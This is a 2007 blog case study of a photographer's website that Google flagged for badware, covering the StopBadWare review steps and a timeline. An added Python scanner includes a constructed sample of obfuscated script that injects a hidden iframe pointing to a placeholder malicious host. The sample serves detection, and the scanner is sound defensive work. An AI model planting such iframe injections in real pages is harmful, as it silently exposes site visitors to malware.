Badware

June 20th, 2007

I just had Rafi, an associate who is a Wedding Photographer in Toronto, contact me wanting some help with his site. Some hacker got into his hosting account and either installed malicious software on his site or added links on his site to malicious software.

I am making a case study out of this incident and will be adding information and resources as I work to get the Google flag and redirect lifted from Rafi’s site.

All the VideoBabylon.ca pages in the Google SERP now have “This Site May Harm Your Computer” right below the title and when you go to click through to the site you are taken to a Warning - visiting this web site may harm your computer! page. This means no traffic from Google until this flag gets lifted.

The following screen shot shows the warning, which I have highlighted in yellow. Here are the live results for a search on Wedding Photographer Toronto.

[Screen shot: “This site may harm your computer” warning shown under the VideoBabylon.ca results]

When you click on the warning for any of the VideoBabylon.ca pages it takes you to a Concerns About Content in our Index page.

When a site gets flagged by Google for badware, Google also sends the data they have gathered to StopBadWare.org which in turn posts this information on their Badware Website Clearinghouse. Here is the Badware Website Clearinghouse record for videobabylon.ca.

In the Google Webmaster Guidelines there is a separate page for the specific guideline Don’t create pages that install viruses, trojans, or other badware, which gives you Google’s position on badware.

For those who are concerned that someone may wrongly or falsely report their site and cause Google to place a warning in the search engine results, StopBadWare has posted the following information on their FAQ page.

Google independently identifies sites that host or distribute badware. If it finds a site that contains or links to badware, it puts up a warning page in the search results for that site (discussed in the FAQ above). Google also informs StopBadware, after the fact, of its findings. If a search for your site leads to a Google warning page, it means that Google’s testing process has found your site to be hosting or distributing badware, and thus potentially harmful. Google does not post warning pages merely in response to reports from the public but only after, and as a result of, its own testing of the site.

Steps to Getting this Flag Removed

1. Get the Badware off Your Site
Read through the StopBadWare Tips for Cleaning and Securing Your Website and read their FAQ about Google Warnings.

Completing the following can significantly shorten the time for StopBadWare to process your review.

Remove all badware and links to badware from your website, and fix any security vulnerabilities that are present on your site… In addition, fixing security vulnerabilities will help prevent badware from being injected onto your site in the future, and thus reduce the probability that your site will be submitted to the Badware Website Clearinghouse again.

VideoBabylon.ca is on a shared hosting account so all files were restored to an older version and all passwords were changed.
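Restoring from backup only helps if the backup itself is clean, so the restored files are worth checking for the kind of injection the time line below describes: obfuscated script that writes a hidden iframe pointing at another site. The following scanner is an added example, not code from the original post; the page fragments and the host malware.example.invalid are constructed placeholders.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed samples (not taken from the compromised site). The host
# "malware.example.invalid" is a placeholder, not a real indicator.
SAMPLE_INFECTED = """<html><body><h1>Wedding Photography</h1>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fmalware.example.invalid%2Fin.php%22%20width%3D%220%22%20height%3D%220%22%20style%3D%22display%3Anone%22%3E%3C%2Fiframe%3E'))</script>
</body></html>"""
SAMPLE_CLEAN = """<html><body><h1>Wedding Photography</h1>
<iframe src="http://www.videobabylon.ca/gallery.html" width="400" height="300"></iframe>
</body></html>"""
ALLOWED_HOSTS = {"videobabylon.ca", "www.videobabylon.ca"}

UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])([^'"]*)\1\s*\)""")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE)


def decode_unescape_payloads(html):
    """Decode every unescape('...') literal so markup hidden inside it can be inspected."""
    return [unquote(m.group(2)) for m in UNESCAPE_RE.finditer(html)]


def find_suspicious_iframes(html, allowed_hosts):
    """Report iframes that are hidden or point off-site, both in the raw page
    and inside decoded unescape() payloads. Legitimate third-party embeds will
    also be listed as off-site; compare the list with what the page should contain."""
    candidates = [(html, False)] + [(p, True) for p in decode_unescape_payloads(html)]
    findings = []
    for text, from_script in candidates:
        for tag in IFRAME_RE.findall(text):
            m = SRC_RE.search(tag)
            src = m.group(1) if m else ""
            host = (urlparse(src).hostname or "").lower()
            hidden = bool(HIDDEN_RE.search(tag))
            offsite = host not in allowed_hosts
            if hidden or offsite:
                findings.append({"src": src, "hidden": hidden, "offsite": offsite,
                                 "from_obfuscated_script": from_script})
    return findings


if __name__ == "__main__":
    for name, page in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(name, find_suspicious_iframes(page, ALLOWED_HOSTS))
```

Run it over every .html and .php file in the restored tree; any hit with from_obfuscated_script set is exactly the pattern StopBadWare later reported and should be removed before requesting a review.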

2. Request a Site Review
The second step is to request a review. On this page you enter your site into the field in front of the “Search Clearinghouse” button and click the button. This will search for your domain.

If you have a warning page from Google, your site should come up. Click on the link to the site after you search and fill out the Review Request. If your site doesn’t come up, you can request a review of your site on the Review Request for Website not in Clearinghouse page.

StopBadWare will forward your request information to Google.

Here is the request for videobabylon.ca.

3. Verify That You Have Requested a Review
After you have requested a review, you want to double check that StopBadWare.org shows you have in fact done this. Go to the Search Badware Website Clearinghouse page and search for your domain. Your domain should show in the results of the search and will have either a red A in a circle or a black A in a circle to the left of the domain.

The red circle shows that you have made a review request; the black circle shows that you have not yet made a request for review.

Here is the status of the request from videobabylon.ca.

4. Monitor the Status of Your Request for Review
After you have verified that you have requested a review you want to monitor that request and wait for the decision that StopBadWare gives.

I am currently monitoring videobabylon.ca.

According to Danny Sullivan, processing still takes up to 2 weeks.

Time Line:
Jun 20 1400hr: Rafi viewed site SERP and there was no flag.
Jun 20 1200hr: Rafi is informed they have been flagged.
Jun 21 1200hr: Rafi replaces all files with backup and changes all passwords.
Jun 21 1200hr: Rafi made a request for review to stopbadware.
Jun 21 1300hr: Rafi contacted SEO Company.
Jun 21 1400hr: SEO Company goes over site. Submits request to stopbadware to review URL www.videobabylon.ca/ which is the URL Google flagged. (The client made a request for review for URL www.videobabylon.ca but Google flagged www.videobabylon.ca/ which stopbadware showed as different).
Jun 25 1900hr: stopbadware shows a review request has been made for www.videobabylon.ca/.
Jul 05 1835hr: stopbadware sends client an email noting the site has obfuscated code that injects an iframe with a link to an infected site. Requests removal of the code and another request for review.

Related Links:
Matt Cutts Blog — How Google handles malware: a historical overview
Matt Cutts Blog — Info about malware warnings and how to appeal them
Matt Cutts Blog — Got malware? Google will help you find it
Google Group — stopbadware
Google Webmaster Central Blog — Better badware notifications for webmasters
Niels Provos & other Googlers — The Ghost In The Browser Analysis of Web-based Malware

Notes:
The Virus Graphics is from Geeks.com tech-tips and is licensed under the Creative Commons Attribution-NonCommercial-NoDerivs 2.5 License.